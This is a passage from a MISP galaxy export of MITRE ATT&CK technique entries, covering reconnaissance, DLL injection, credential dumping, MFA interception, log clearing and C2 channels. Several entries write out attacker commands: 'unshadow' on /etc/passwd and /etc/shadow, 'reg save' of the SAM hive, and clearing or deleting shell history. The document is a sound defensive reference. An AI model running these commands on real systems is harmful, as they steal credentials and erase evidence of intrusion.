The tag is: misp-galaxy:mitre-attack-pattern="Modify Cloud Compute Infrastructure - T1578"

Table 5622. Table References

Links

https://attack.mitre.org/techniques/T1578

https://content.fireeye.com/m-trends/rpt-m-trends-2020

Gather Victim Identity Information - T1589

Adversaries may gather information about the victim’s identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: misp-galaxy:mitre-attack-pattern="Gather Victim Identity Information - T1589"

Table 5623. Table References

Links

https://attack.mitre.org/techniques/T1589

https://github.com/dxa4481/truffleHog

https://github.com/michenriksen/gitrob

https://grimhacker.com/2017/07/24/office365-activesync-username-enumeration/

https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/

https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196

https://www.opm.gov/cybersecurity/cybersecurity-incidents/

https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/

https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/

SNMP (MIB Dump) - T1602.001

Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).

The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.

Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001"

Table 5624. Table References

Links

https://attack.mitre.org/techniques/T1602/001

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3

https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051

https://www.us-cert.gov/ncas/alerts/TA18-106A

Logon Script (Windows) - T1037.001

Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.

The tag is: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001"

Table 5625. Table References

Links

http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/

https://attack.mitre.org/techniques/T1037/001

https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx

Push-notification client-side exploit - T1373

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique to push an [iOS](https://www.apple.com/ios) or [Android](https://www.android.com) MMS-type message to the target which does not require interaction on the part of the target to be successful. (Citation: BlackHat Stagefright) (Citation: WikiStagefright)

The tag is: misp-galaxy:mitre-attack-pattern="Push-notification client-side exploit - T1373"

Table 5626. Table References

Links

https://attack.mitre.org/techniques/T1373

Adversaries may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges. DLL injection is a method of executing arbitrary code in the address space of a separate live process.

DLL injection is commonly performed by writing the path to a DLL in the virtual address space of the target process before loading the DLL by invoking a new thread. The write can be performed with native Windows API calls such as <code>VirtualAllocEx</code> and <code>WriteProcessMemory</code>, then invoked with <code>CreateRemoteThread</code> (which calls the <code>LoadLibrary</code> API responsible for loading the DLL). (Citation: Elastic Process Injection July 2017)

Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue as well as the additional APIs to invoke execution (since these methods load and execute the files in memory by manually preforming the function of <code>LoadLibrary</code>).(Citation: Elastic HuntingNMemory June 2017)(Citation: Elastic Process Injection July 2017)

Another variation of this method, often referred to as Module Stomping/Overloading or DLL Hollowing, may be leveraged to conceal injected code within a process. This method involves loading a legitimate DLL into a remote process then manually overwriting the module’s <code>AddressOfEntryPoint</code> before starting a new thread in the target process.(Citation: Module Stomping for Shellcode Injection) This variation allows attackers to hide malicious injected code by potentially backing its execution with a legitimate DLL file on disk.(Citation: Hiding Malicious Code with Module Stomping)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via DLL injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001"

Table 5627. Table References

Links

https://attack.mitre.org/techniques/T1055/001

https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/

https://www.endgame.com/blog/technical-blog/hunting-memory

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection

Exploit Public-Facing Application - T1190

Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190"

Table 5628. Table References

Links

https://attack.mitre.org/techniques/T1190

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://cwe.mitre.org/top25/index.html

https://nvd.nist.gov/vuln/detail/CVE-2014-7169

https://nvd.nist.gov/vuln/detail/CVE-2016-6662

https://us-cert.cisa.gov/ncas/alerts/TA18-106A

https://www.cisecurity.org/advisory/multiple-vulnerabilities-in-microsoft-windows-smb-server-could-allow-for-remote-code-execution/

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/

Untargeted client-side exploitation - T1370

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique that takes advantage of flaws in client-side applications without targeting specific users. For example, an exploit placed on an often widely used public web site intended for drive-by delivery to whomever visits the site. (Citation: CitizenLabGreatCannon)

The tag is: misp-galaxy:mitre-attack-pattern="Untargeted client-side exploitation - T1370"

Table 5629. Table References

Links

https://attack.mitre.org/techniques/T1370

Non-Application Layer Protocol - T1095

Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).

ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.

The tag is: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095"

Table 5630. Table References

Links

http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29

http://support.microsoft.com/KB/170292

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1095

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Multi-Factor Authentication Interception - T1111

Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.

If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)

Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user’s personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)

Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.(Citation: Okta Scatter Swine 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Multi-Factor Authentication Interception - T1111"

Table 5631. Table References

Links

https://attack.mitre.org/techniques/T1111

https://dl.mandiant.com/EE/assets/PDF_MTrends_2011.pdf

https://gcn.com/cybersecurity/2011/06/rsa-confirms-its-tokens-used-in-lockheed-hack/282818/

https://sec.okta.com/scatterswine

Host-based hiding techniques - T1314

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1314).

Host based hiding techniques are designed to allow an adversary to remain undetected on a machine upon which they have taken action. They may do this through the use of static linking of binaries, polymorphic code, exploiting weakness in file formats, parsers, or self-deleting code. (Citation: VirutAP)

The tag is: misp-galaxy:mitre-attack-pattern="Host-based hiding techniques - T1314"

Table 5632. Table References

Links

https://attack.mitre.org/techniques/T1314

Network-based hiding techniques - T1315

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1315).

Technical network hiding techniques are methods of modifying traffic to evade network signature detection or to utilize misattribution techniques. Examples include channel/IP/VLAN hopping, mimicking legitimate operations, or seeding with misinformation. (Citation: HAMMERTOSS2015)

The tag is: misp-galaxy:mitre-attack-pattern="Network-based hiding techniques - T1315"

Table 5633. Table References

Links

https://attack.mitre.org/techniques/T1315

Targeted client-side exploitation - T1371

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

A technique used to compromise a specific group of end users by taking advantage of flaws in client-side applications. For example, infecting websites that members of a targeted group are known to visit with the goal to infect a targeted user’s computer. (Citation: RSASEThreat) (Citation: WikiStagefright) (Citation: ForbesSecurityWeek) (Citation: StrongPity-waterhole)

The tag is: misp-galaxy:mitre-attack-pattern="Targeted client-side exploitation - T1371"

Table 5634. Table References

Links

https://attack.mitre.org/techniques/T1371

Insecure Third-Party Libraries - T1425

Third-party libraries incorporated into mobile apps could contain malicious behavior, privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately insert malicious behavior or could exploit inadvertent vulnerabilities.

For example, Ryan Welton of NowSecure identified exploitable remote code execution vulnerabilities in a third-party advertisement library (Citation: NowSecure-RemoteCode). Grace et al. identified security issues in mobile advertisement libraries (Citation: Grace-Advertisement).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Insecure Third-Party Libraries - T1425"

Insecure Third-Party Libraries - T1425 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474" with estimative-language:likelihood-probability="almost-certain"

Table 5635. Table References

Links

https://attack.mitre.org/techniques/T1425

Exploit public-facing application - T1377

This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190).

The use of software, data, or commands to take advantage of a weakness in a computer system or program in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. (Citation: GoogleCrawlerSQLInj)

The tag is: misp-galaxy:mitre-attack-pattern="Exploit public-facing application - T1377"

Table 5636. Table References

Links

https://attack.mitre.org/techniques/T1377

Search Victim-Owned Websites - T1594

Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)

Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Victim-Owned Websites - T1594"

Table 5637. Table References

Links

https://attack.mitre.org/techniques/T1594

https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/

/etc/passwd and /etc/shadow - T1003.008

Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)

The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) <code># /usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db</code>

The tag is: misp-galaxy:mitre-attack-pattern="/etc/passwd and /etc/shadow - T1003.008"

Table 5638. Table References

Links

https://attack.mitre.org/techniques/T1003/008

https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/

https://www.tldp.org/LDP/lame/LAME/linux-admin-made-easy/shadow-file-formats.html

SMB/Windows Admin Shares - T1021.002

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.

Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)

The tag is: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002"

Table 5639. Table References

Links

http://support.microsoft.com/kb/314984

https://attack.mitre.org/techniques/T1021/002

https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem

https://docs.microsoft.com/en-us/archive/blogs/jepayne/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts

https://en.wikipedia.org/wiki/Server_Message_Block

https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96

https://technet.microsoft.com/en-us/library/cc787851.aspx

Disguise Root/Jailbreak Indicators - T1630.003

An adversary could use knowledge of the techniques used by security software to evade detection.(Citation: Brodie)(Citation: Tan) For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed "su" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection.(Citation: Rastogi)

The tag is: misp-galaxy:mitre-attack-pattern="Disguise Root/Jailbreak Indicators - T1630.003"

Table 5640. Table References

Links

http://pages.cs.wisc.edu/vrastogi/static/papers/rcj13b.pdf

http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions

https://attack.mitre.org/techniques/T1630/003

https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf

https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html

Reduce Key Space - T1600.001

Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)

Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.

Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Reduce Key Space - T1600.001"

Table 5641. Table References

Links

https://attack.mitre.org/techniques/T1600/001

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Security Account Manager - T1003.002

Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.

A number of tools can be used to retrieve the SAM file through in-memory techniques:

Alternatively, the SAM can be extracted from the Registry with Reg:

  • <code>reg save HKLM\sam sam</code>

  • <code>reg save HKLM\system system</code>

Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)

Notes:

  • RID 500 account is the local, built-in administrator.

  • RID 501 is the guest account.

  • User accounts start with a RID of 1,000+.

The tag is: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002"

Table 5642. Table References

Links

https://attack.mitre.org/techniques/T1003/002

https://github.com/Neohapsis/creddump7

Disable Crypto Hardware - T1600.002

Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.

Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://attack.mitre.org/techniques/T1601), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001)). (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Disable Crypto Hardware - T1600.002"

Table 5643. Table References

Links

https://attack.mitre.org/techniques/T1600/002

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Cached Domain Credentials - T1003.005

Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)

On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)

With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.

Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)

The tag is: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005"

Table 5644. Table References

Links

https://attack.mitre.org/techniques/T1003/005

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh994565(v%3Dws.11)

https://github.com/mattifestation/PowerSploit

https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-credentials

https://passlib.readthedocs.io/en/stable/lib/passlib.hash.msdcc2.html

Clear Command History - T1070.003

In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they’ve done.

On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user’s home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they’ve used before in different sessions.

Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or deleting the bash history file <code>rm ~/.bash_history</code>.

Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).(Citation: US-CERT-TA18-106A)

On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.

The <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)

Adversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)

The tag is: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003"

Table 5645. Table References

Links

https://attack.mitre.org/techniques/T1070/003

https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit

https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7

https://www.us-cert.gov/ncas/alerts/TA18-106A

Clear Mailbox Data - T1070.008

Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests.

Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](Internal Spearphishing(https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the <code>ExchangePowerShell</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including <code>Remove-MailboxExportRequest</code> to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called <code>mail</code> or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)

Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Clear Mailbox Data - T1070.008"

Table 5646. Table References

Links

https://attack.mitre.org/techniques/T1070/008

https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf

https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes

https://man7.org/linux/man-pages/man1/mailx.1p.html

https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

Exfiltration Over Bluetooth - T1011.001

Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.

Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration Over Bluetooth - T1011.001"

Table 5647. Table References

Links

https://attack.mitre.org/techniques/T1011/001

Dead Drop Resolver - T1102.001

Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001"

Table 5648. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1102/001

Remote Desktop Protocol - T1021.001

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001"

Table 5649. Table References

Links

http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/

https://attack.mitre.org/techniques/T1021/001

https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx

Internet Connection Discovery - T1016.001

Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.

Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.

The tag is: misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001"

Table 5650. Table References

Links

https://attack.mitre.org/techniques/T1016/001

Patch System Image - T1601.001

